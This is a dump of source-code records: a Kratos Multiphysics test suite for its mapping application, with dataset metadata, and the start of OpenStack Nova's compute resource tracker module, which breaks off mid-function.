KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_InverseMap_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_Map_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
def test_InverseMap_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
# def test_UpdateInterface(self):
# pass
# def test_TO_NON_HISTORICAL(self):
# pass
# def test_FROM_NON_HISTORICAL(self):
# pass
# def test_both_NON_HISTORICAL(self):
# pass
def _CheckHistoricalUniformValuesScalar(self, nodes, variable, exp_value):
for node in nodes:
self.assertAlmostEqual(node.GetSolutionStepValue(variable), exp_value)
def _CheckHistoricalUniformValuesVector(self, nodes, variable, exp_value):
for node in nodes:
nodal_val = node.GetSolutionStepValue(variable)
self.assertAlmostEqual(nodal_val[0], exp_value[0])
self.assertAlmostEqual(nodal_val[1], exp_value[1])
self.assertAlmostEqual(nodal_val[2], exp_value[2])
def _CheckUniformValuesScalar(self, entities, variable, exp_value):
for entity in entities:
self.assertAlmostEqual(entity.GetValue(variable), exp_value)
def _CheckUniformValuesVector(self, entities, variable, exp_value):
for entity in entities:
val = entity.GetValue(variable)
self.assertAlmostEqual(val[0], exp_value[0])
self.assertAlmostEqual(val[1], exp_value[1])
self.assertAlmostEqual(val[2], exp_value[2])
def __GetFileName(self, file_appendix):
return os.path.join("result_files", self.mapper_type, self.__class__.__name__ + "_" + file_appendix)
def SetHistoricalNonUniformSolutionScalar(nodes, variable):
for node in nodes:
val = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
node.SetSolutionStepValue(variable, val)
def SetHistoricalNonUniformSolutionVector(nodes, variable):
for node in nodes:
val_1 = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
val_2 = 33*cos(node.X0) + node.Y0*5 + 22*node.Z0
val_3 = 12*sin(node.Y0) + node.Z0*15 + 22*node.X0
node.SetSolutionStepValue(variable, KM.Vector([val_1, val_2, val_3]))
def GetNodes(model_part):
return model_part.GetCommunicator().LocalMesh().Nodes
# return model_part.Nodes # TODO this is the correct version, requires some synchronization though!
| 55.56705
| 158
| 0.745984
|
from __future__ import print_function, absolute_import, division
import KratosMultiphysics as KM
import KratosMultiphysics.MappingApplication as KratosMapping
data_comm = KM.DataCommunicator.GetDefault()
import mapper_test_case
from math import sin, cos
import os
def GetFilePath(file_name):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), file_name)
class BasicMapperTests(mapper_test_case.MapperTestCase):
@classmethod
def setUpMapper(cls, mapper_parameters, switch_sides=False):
if switch_sides:
super(BasicMapperTests, cls).setUpModelParts("cube_quad", "cube_tri")
else:
super(BasicMapperTests, cls).setUpModelParts("cube_tri", "cube_quad")
cls.mapper_type = mapper_parameters["mapper_type"].GetString()
if mapper_parameters.Has("interface_submodel_part_origin"):
cls.interface_model_part_origin = cls.model_part_origin.GetSubModelPart(
mapper_parameters["interface_submodel_part_origin"].GetString())
else:
cls.interface_model_part_origin = cls.model_part_origin
if mapper_parameters.Has("interface_submodel_part_destination"):
cls.interface_model_part_destination = cls.model_part_destination.GetSubModelPart(
mapper_parameters["interface_submodel_part_destination"].GetString())
else:
cls.interface_model_part_destination = cls.model_part_destination
if data_comm.IsDistributed():
cls.mapper = KratosMapping.MapperFactory.CreateMPIMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
else:
cls.mapper = KratosMapping.MapperFactory.CreateMapper(
cls.model_part_origin, cls.model_part_destination, mapper_parameters)
def test_Map_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val)
def test_InverseMap_constant_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val)
def test_Map_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val)
def test_InverseMap_constant_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val)
def test_Map_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_origin.Nodes, KM.PRESSURE)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.TEMPERATURE, GetFilePath(self.__GetFileName("map_scalar")))
def test_InverseMap_non_constant_scalar(self):
SetHistoricalNonUniformSolutionScalar(self.interface_model_part_destination.Nodes, KM.TEMPERATURE)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.PRESSURE, GetFilePath(self.__GetFileName("inverse_map_scalar")))
def test_Map_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_origin.Nodes, KM.FORCE)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_destination, KM.VELOCITY, GetFilePath(self.__GetFileName("map_vector")))
def test_InverseMap_non_constant_vector(self):
SetHistoricalNonUniformSolutionVector(self.interface_model_part_destination.Nodes, KM.VELOCITY)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
mapper_test_case.CheckHistoricalNonUniformValues(self.interface_model_part_origin, KM.FORCE, GetFilePath(self.__GetFileName("inverse_map_vector")))
def test_SWAP_SIGN_Map_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, -val)
def test_SWAP_SIGN_InverseMap_scalar(self):
val = -571.147
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, -val)
def test_SWAP_SIGN_Map_vector(self):
val = KM.Vector([1.234, -22.845, 11.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, [(-1)*x for x in val])
def test_SWAP_SIGN_InverseMap_vector(self):
val = KM.Vector([-51.234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, [(-1)*x for x in val])
def test_ADD_VALUES_Map_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1+val_2)
def test_ADD_VALUES_InverseMap_scalar(self):
val_1 = -571.147
val_2 = 128.336
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_origin), KM.PRESSURE, val_1+val_2)
def test_ADD_VALUES_Map_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.FORCE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY)
KM.VariableUtils().SetVectorVar(KM.FORCE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_destination), KM.VELOCITY, val_1+val_2)
def test_ADD_VALUES_InverseMap_vector(self):
val_1 = KM.Vector([1.234, -22.845, 11.83])
val_2 = KM.Vector([-51.9234, -22.845, 118.775])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_1, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY)
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val_2, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.ADD_VALUES)
self._CheckHistoricalUniformValuesVector(GetNodes(self.interface_model_part_origin), KM.FORCE, val_1+val_2)
def test_SWAP_SIGN_and_ADD_VALUES_scalar(self):
val_1 = 1.234
val_2 = -571.147
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_1, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE)
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val_2, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.ADD_VALUES | KratosMapping.Mapper.SWAP_SIGN)
self._CheckHistoricalUniformValuesScalar(GetNodes(self.interface_model_part_destination), KM.TEMPERATURE, val_1-val_2)
def test_Map_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.PRESSURE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_InverseMap_USE_TRANSPOSE_constant_scalar(self):
val = 1.234
KM.VariableUtils().SetScalarVar(KM.TEMPERATURE, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.PRESSURE, KM.TEMPERATURE, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.PRESSURE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeScalarVariable(KM.TEMPERATURE, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin, sum_destination)
def test_Map_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.FORCE, val, self.interface_model_part_origin.Nodes)
self.mapper.Map(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
def test_InverseMap_USE_TRANSPOSE_constant_vector(self):
val = KM.Vector([1.234, -22.845, 11.83])
KM.VariableUtils().SetVectorVar(KM.VELOCITY, val, self.interface_model_part_destination.Nodes)
self.mapper.InverseMap(KM.FORCE, KM.VELOCITY, KratosMapping.Mapper.USE_TRANSPOSE)
sum_origin = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.FORCE, self.interface_model_part_origin, 0)
sum_destination = KM.VariableUtils().SumHistoricalNodeVectorVariable(KM.VELOCITY, self.interface_model_part_destination, 0)
self.assertAlmostEqual(sum_origin[0], sum_destination[0])
self.assertAlmostEqual(sum_origin[1], sum_destination[1])
self.assertAlmostEqual(sum_origin[2], sum_destination[2])
def _CheckHistoricalUniformValuesScalar(self, nodes, variable, exp_value):
for node in nodes:
self.assertAlmostEqual(node.GetSolutionStepValue(variable), exp_value)
def _CheckHistoricalUniformValuesVector(self, nodes, variable, exp_value):
for node in nodes:
nodal_val = node.GetSolutionStepValue(variable)
self.assertAlmostEqual(nodal_val[0], exp_value[0])
self.assertAlmostEqual(nodal_val[1], exp_value[1])
self.assertAlmostEqual(nodal_val[2], exp_value[2])
def _CheckUniformValuesScalar(self, entities, variable, exp_value):
for entity in entities:
self.assertAlmostEqual(entity.GetValue(variable), exp_value)
def _CheckUniformValuesVector(self, entities, variable, exp_value):
for entity in entities:
val = entity.GetValue(variable)
self.assertAlmostEqual(val[0], exp_value[0])
self.assertAlmostEqual(val[1], exp_value[1])
self.assertAlmostEqual(val[2], exp_value[2])
def __GetFileName(self, file_appendix):
return os.path.join("result_files", self.mapper_type, self.__class__.__name__ + "_" + file_appendix)
def SetHistoricalNonUniformSolutionScalar(nodes, variable):
for node in nodes:
val = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
node.SetSolutionStepValue(variable, val)
def SetHistoricalNonUniformSolutionVector(nodes, variable):
for node in nodes:
val_1 = 12*sin(node.X0) + node.Y0*15 + 22*node.Z0
val_2 = 33*cos(node.X0) + node.Y0*5 + 22*node.Z0
val_3 = 12*sin(node.Y0) + node.Z0*15 + 22*node.X0
node.SetSolutionStepValue(variable, KM.Vector([val_1, val_2, val_3]))
def GetNodes(model_part):
return model_part.GetCommunicator().LocalMesh().Nodes
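# Illustrative usage sketch (added commentary, not part of the original test
# file): the helpers above impose a smooth, node-dependent field before
# mapping so that interpolation errors become visible. A hypothetical call
# pattern, assuming ``mp`` is a ModelPart with the historical variables
# allocated:
#
#     nodes = GetNodes(mp)
#     SetHistoricalNonUniformSolutionScalar(nodes, KM.PRESSURE)
#     SetHistoricalNonUniformSolutionVector(nodes, KM.VELOCITY)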
| true
| true
|
1c492bcb27d27789656c4e0b0678b09dd514cab8
| 94,240
|
py
|
Python
|
nova/compute/resource_tracker.py
|
zjzh/nova
|
7bb21723171c59b93e28f5d508c2b6df39220f13
|
[
"Apache-2.0"
] | 1,874
|
2015-01-04T05:18:34.000Z
|
2022-03-31T03:30:28.000Z
|
nova/compute/resource_tracker.py
|
zjzh/nova
|
7bb21723171c59b93e28f5d508c2b6df39220f13
|
[
"Apache-2.0"
] | 40
|
2015-04-13T02:32:42.000Z
|
2022-02-16T02:28:06.000Z
|
nova/compute/resource_tracker.py
|
zjzh/nova
|
7bb21723171c59b93e28f5d508c2b6df39220f13
|
[
"Apache-2.0"
] | 1,996
|
2015-01-04T15:11:51.000Z
|
2022-03-31T11:03:13.000Z
|
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Track resources like memory and disk for a compute host. Provides the
scheduler with useful information about availability through the ComputeNode
model.
"""
import collections
import copy
from keystoneauth1 import exceptions as ks_exc
import os_traits
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
import retrying
from nova.compute import claims
from nova.compute import monitors
from nova.compute import provider_config
from nova.compute import stats as compute_stats
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
from nova.objects import migration as migration_obj
from nova.pci import manager as pci_manager
from nova.pci import request as pci_request
from nova import rpc
from nova.scheduler.client import report
from nova import utils
from nova.virt import hardware
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
COMPUTE_RESOURCE_SEMAPHORE = "compute_resources"
def _instance_in_resize_state(instance):
"""Returns True if the instance is in one of the resizing states.
:param instance: `nova.objects.Instance` object
"""
vm = instance.vm_state
task = instance.task_state
if vm == vm_states.RESIZED:
return True
if vm in [vm_states.ACTIVE, vm_states.STOPPED] and task in (
task_states.resizing_states + task_states.rebuild_states):
return True
return False
def _instance_is_live_migrating(instance):
vm = instance.vm_state
task = instance.task_state
if task == task_states.MIGRATING and vm in [vm_states.ACTIVE,
vm_states.PAUSED]:
return True
return False
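# Illustrative examples (added commentary, not part of the original module)
# of how the two predicates above classify an instance; the state constants
# come from nova.compute.vm_states / task_states:
#
#     instance.vm_state = vm_states.RESIZED      # any task_state
#     _instance_in_resize_state(instance)        # -> True
#
#     instance.vm_state = vm_states.ACTIVE
#     instance.task_state = task_states.MIGRATING
#     _instance_is_live_migrating(instance)      # -> True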
class ResourceTracker(object):
"""Compute helper class for keeping track of resource usage as instances
are built and destroyed.
"""
def __init__(self, host, driver, reportclient=None):
self.host = host
self.driver = driver
self.pci_tracker = None
# Dict of objects.ComputeNode objects, keyed by nodename
self.compute_nodes = {}
# Dict of Stats objects, keyed by nodename
self.stats = collections.defaultdict(compute_stats.Stats)
# Set of UUIDs of instances tracked on this host.
self.tracked_instances = set()
self.tracked_migrations = {}
self.is_bfv = {} # dict, keyed by instance uuid, to is_bfv boolean
monitor_handler = monitors.MonitorHandler(self)
self.monitors = monitor_handler.monitors
self.old_resources = collections.defaultdict(objects.ComputeNode)
self.reportclient = reportclient or report.SchedulerReportClient()
self.ram_allocation_ratio = CONF.ram_allocation_ratio
self.cpu_allocation_ratio = CONF.cpu_allocation_ratio
self.disk_allocation_ratio = CONF.disk_allocation_ratio
self.provider_tree = None
# Dict of assigned_resources, keyed by resource provider uuid
# the value is a dict again, keyed by resource class
# and value of this sub-dict is a set of Resource obj
self.assigned_resources = collections.defaultdict(
lambda: collections.defaultdict(set))
# Retrieves dict of provider config data. This can fail with
# nova.exception.ProviderConfigException if invalid or conflicting
# data exists in the provider config files.
self.provider_configs = provider_config.get_provider_configs(
CONF.compute.provider_config_location)
# Set of ids for providers identified in provider config files that
# are not found on the provider tree. These are tracked to facilitate
# smarter logging.
self.absent_providers = set()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def instance_claim(self, context, instance, nodename, allocations,
limits=None):
"""Indicate that some resources are needed for an upcoming compute
instance build operation.
This should be called before the compute node is about to perform
an instance build operation that will consume additional resources.
:param context: security context
:param instance: instance to reserve resources for.
:type instance: nova.objects.instance.Instance object
:param nodename: The Ironic nodename selected by the scheduler
:param allocations: The placement allocation records for the instance.
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs.
:returns: A Claim ticket representing the reserved resources. It can
be used to revert the resource usage if an error occurs
during the instance build.
"""
if self.disabled(nodename):
# instance_claim() was called before update_available_resource()
# (which ensures that a compute node exists for nodename). We
# shouldn't get here but in case we do, just set the instance's
# host and nodename attribute (probably incorrect) and return a
# NoopClaim.
# TODO(jaypipes): Remove all the disabled junk from the resource
# tracker. Servicegroup API-level active-checking belongs in the
# nova-compute manager.
self._set_instance_host_and_node(instance, nodename)
return claims.NopClaim()
# sanity checks:
if instance.host:
LOG.warning("Host field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
if instance.node:
LOG.warning("Node field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
cn = self.compute_nodes[nodename]
pci_requests = instance.pci_requests
claim = claims.Claim(context, instance, nodename, self, cn,
pci_requests, limits=limits)
# self._set_instance_host_and_node() will save instance to the DB
# so set instance.numa_topology first. We need to make sure
# that numa_topology is saved while under COMPUTE_RESOURCE_SEMAPHORE
# so that the resource audit knows about any cpus we've pinned.
instance_numa_topology = claim.claimed_numa_topology
instance.numa_topology = instance_numa_topology
self._set_instance_host_and_node(instance, nodename)
if self.pci_tracker:
# NOTE(jaypipes): ComputeNode.pci_device_pools is set below
# in _update_usage_from_instance().
self.pci_tracker.claim_instance(context, pci_requests,
instance_numa_topology)
claimed_resources = self._claim_resources(allocations)
instance.resources = claimed_resources
# Mark resources in-use and update stats
self._update_usage_from_instance(context, instance, nodename)
elevated = context.elevated()
# persist changes to the compute node:
self._update(elevated, cn)
return claim
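    # Illustrative caller sketch (added commentary, not part of the original
    # module): Claim objects support the context-manager protocol, so a
    # hypothetical caller can revert the claimed usage automatically when the
    # build fails:
    #
    #     with rt.instance_claim(ctxt, instance, nodename, allocs, limits):
    #         spawn_instance()  # claimed usage is dropped if this raises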
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def rebuild_claim(self, context, instance, nodename, allocations,
limits=None, image_meta=None, migration=None):
"""Create a claim for a rebuild operation."""
return self._move_claim(
context, instance, instance.flavor, nodename, migration,
allocations, move_type=fields.MigrationType.EVACUATION,
image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def resize_claim(
self, context, instance, flavor, nodename, migration, allocations,
image_meta=None, limits=None,
):
"""Create a claim for a resize or cold-migration move.
Note that this code assumes ``instance.new_flavor`` is set when
resizing with a new flavor.
"""
return self._move_claim(
context, instance, flavor, nodename, migration,
allocations, image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def live_migration_claim(
self, context, instance, nodename, migration, limits, allocs,
):
"""Builds a MoveClaim for a live migration.
:param context: The request context.
:param instance: The instance being live migrated.
:param nodename: The nodename of the destination host.
:param migration: The Migration object associated with this live
migration.
:param limits: A SchedulerLimits object from when the scheduler
selected the destination host.
:param allocs: The placement allocation records for the instance.
:returns: A MoveClaim for this live migration.
"""
# Flavor and image cannot change during a live migration.
flavor = instance.flavor
image_meta = instance.image_meta
return self._move_claim(
context, instance, flavor, nodename, migration, allocs,
move_type=fields.MigrationType.LIVE_MIGRATION,
image_meta=image_meta, limits=limits,
)
def _move_claim(
self, context, instance, new_flavor, nodename, migration, allocations,
move_type=None, image_meta=None, limits=None,
):
"""Indicate that resources are needed for a move to this host.
Move can be either a migrate/resize, live-migrate or an
evacuate/rebuild operation.
:param context: security context
:param instance: instance object to reserve resources for
:param new_flavor: new flavor being resized to
:param nodename: The Ironic nodename selected by the scheduler
:param migration: A migration object if one was already created
elsewhere for this operation (otherwise None)
:param allocations: the placement allocation records.
:param move_type: move type - can be one of 'migration', 'resize',
'live-migration', 'evacuate'
:param image_meta: instance image metadata
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs
        :returns: A Claim ticket representing the reserved resources. This
            should be used to finalize the resource claim or free the
            resources after the compute operation is finished.
"""
image_meta = image_meta or {}
if migration:
self._claim_existing_migration(migration, nodename)
else:
migration = self._create_migration(
context, instance, new_flavor, nodename, move_type)
if self.disabled(nodename):
# compute_driver doesn't support resource tracking, just
# generate the migration record and continue the resize:
return claims.NopClaim(migration=migration)
cn = self.compute_nodes[nodename]
# TODO(moshele): we are recreating the pci requests even if
# there was no change on resize. This will cause allocating
# the old/new pci device in the resize phase. In the future
# we would like to optimise this.
new_pci_requests = pci_request.get_pci_requests_from_flavor(
new_flavor)
new_pci_requests.instance_uuid = instance.uuid
# On resize merge the SR-IOV ports pci_requests
# with the new instance flavor pci_requests.
if instance.pci_requests:
for request in instance.pci_requests.requests:
if request.source == objects.InstancePCIRequest.NEUTRON_PORT:
new_pci_requests.requests.append(request)
claim = claims.MoveClaim(context, instance, nodename,
new_flavor, image_meta, self, cn,
new_pci_requests, migration, limits=limits)
claimed_pci_devices_objs = []
# TODO(artom) The second part of this condition should not be
# necessary, but since SRIOV live migration is currently handled
# elsewhere - see for example _claim_pci_for_instance_vifs() in the
# compute manager - we don't do any PCI claims if this is a live
# migration to avoid stepping on that code's toes. Ideally,
# MoveClaim/this method would be used for all live migration resource
# claims.
if self.pci_tracker and not migration.is_live_migration:
# NOTE(jaypipes): ComputeNode.pci_device_pools is set below
# in _update_usage_from_instance().
claimed_pci_devices_objs = self.pci_tracker.claim_instance(
context, new_pci_requests, claim.claimed_numa_topology)
claimed_pci_devices = objects.PciDeviceList(
objects=claimed_pci_devices_objs)
claimed_resources = self._claim_resources(allocations)
old_resources = instance.resources
# TODO(jaypipes): Move claimed_numa_topology out of the Claim's
# constructor flow so the Claim constructor only tests whether
# resources can be claimed, not consume the resources directly.
mig_context = objects.MigrationContext(
context=context, instance_uuid=instance.uuid,
migration_id=migration.id,
old_numa_topology=instance.numa_topology,
new_numa_topology=claim.claimed_numa_topology,
old_pci_devices=instance.pci_devices,
new_pci_devices=claimed_pci_devices,
old_pci_requests=instance.pci_requests,
new_pci_requests=new_pci_requests,
old_resources=old_resources,
new_resources=claimed_resources)
instance.migration_context = mig_context
instance.save()
# Mark the resources in-use for the resize landing on this
# compute host:
self._update_usage_from_migration(context, instance, migration,
nodename)
elevated = context.elevated()
self._update(elevated, cn)
return claim
def _create_migration(
self, context, instance, new_flavor, nodename, move_type=None,
):
"""Create a migration record for the upcoming resize. This should
        be done while the COMPUTE_RESOURCE_SEMAPHORE is held so the resource
claim will not be lost if the audit process starts.
"""
migration = objects.Migration(context=context.elevated())
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
migration.old_instance_type_id = instance.flavor.id
migration.new_instance_type_id = new_flavor.id
migration.status = 'pre-migrating'
migration.instance_uuid = instance.uuid
migration.source_compute = instance.host
migration.source_node = instance.node
if move_type:
migration.migration_type = move_type
else:
migration.migration_type = migration_obj.determine_migration_type(
migration)
migration.create()
return migration
def _claim_existing_migration(self, migration, nodename):
"""Make an existing migration record count for resource tracking.
If a migration record was created already before the request made
it to this compute host, only set up the migration so it's included in
resource tracking. This should be done while the
        COMPUTE_RESOURCE_SEMAPHORE is held.
"""
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
# NOTE(artom) Migration objects for live migrations are created with
# status 'accepted' by the conductor in live_migrate_instance() and do
# not have a 'pre-migrating' status.
if not migration.is_live_migration:
migration.status = 'pre-migrating'
migration.save()
def _claim_resources(self, allocations):
"""Claim resources according to assigned resources from allocations
and available resources in provider tree
"""
if not allocations:
return None
claimed_resources = []
for rp_uuid, alloc_dict in allocations.items():
try:
provider_data = self.provider_tree.data(rp_uuid)
except ValueError:
# If an instance is in evacuating, it will hold new and old
